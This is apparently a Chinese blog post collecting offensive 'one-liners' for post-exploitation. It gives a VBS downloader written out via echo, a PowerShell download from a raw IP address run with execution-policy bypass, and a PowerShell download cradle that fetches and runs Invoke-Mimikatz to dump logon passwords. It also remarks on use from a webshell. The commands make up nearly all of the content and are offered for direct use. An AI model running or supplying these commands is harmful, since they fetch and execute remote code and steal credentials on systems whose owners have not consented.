各种一句话(持续更新)

vbs一句话下载转自冷风大神的文章:http://blog.csdn.net/chinafe/article/details/46860051

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> d:\d.vbs

利用方式为:

cscript d:/d.vbs http://114.55.40.185/Bin.rar d:/bin.rar

第一个参数是要下载的文件url地址,第二个参数是保存在本地的地址

powershell一句话下载文件:

echo $d=New-Object System.Net.WebClient;$d.DownloadFile("http://114.55.40.185/Bin.rar","C:/Temp/1.zip") >> 1.ps1

利用方式:

powershell -ExecutionPolicy Bypass -File .\1.ps1


powershell一句话获取主机密码(mimikatz的一句话版本)

Ps:似乎不能在webshell里面用

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –command sekurlsa::logonpasswords


  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值